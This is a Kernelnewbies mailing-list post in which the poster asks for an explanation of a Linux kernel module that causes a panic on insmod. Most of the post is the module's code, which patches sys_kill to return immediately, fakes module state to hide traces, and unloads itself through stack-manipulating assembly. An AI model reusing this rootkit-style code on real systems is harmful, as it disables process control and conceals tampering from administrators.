Kernel panic after insmod
Manavendra Nath Manav
mnm.kernel at gmail.com
Sun Jun 26 05:35:55 EDT 2016
Can someone explain the following kernel module code. I'm not familiar with
x86 assembly so have problem understanding this part. Also it seems this
code is able to modify the kernel stack.
/******************start****************/
#include <linux/module.h>
MODULE_LICENSE("GPL");
int __init init(void) __attribute__((noreturn))
{
unsigned long long cr0 = read_cr0();
write_cr0(cr0 & ~(1 << 4)); /* Clear Extension Type (ET) bit */
*(unsigned char *)sys_kill = 0xc3; /* opcode for "ret" */
write_cr0(cr0);
/* Optional code ahead to hide traces of this module. */
__this_module.refcnt = 1;
__this_module.state = MODULE_STATE_LIVE;
asm
(
"mov %0, %%rsp\n\t"
"mov %1, %%rdi\n\t" /* name = __this_module.name */
"xor %%rsi, %%rsi\n\t" /* flags = 0 */
"jmp sys_delete_module\n\t" /* call delete_module(name, flags) */
:: "r"(current->stack + THREAD_SIZE - sizeof(struct pt_regs) - 8), "r"(__
this_module.name) :
);
}
void __exit exit(void)
{
return;
}
/*******************end*****************/
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.kernelnewbies.org/pipermail/kernelnewbies/attachments/20160626/50b70a47/attachment.html
More information about the Kernelnewbies
mailing list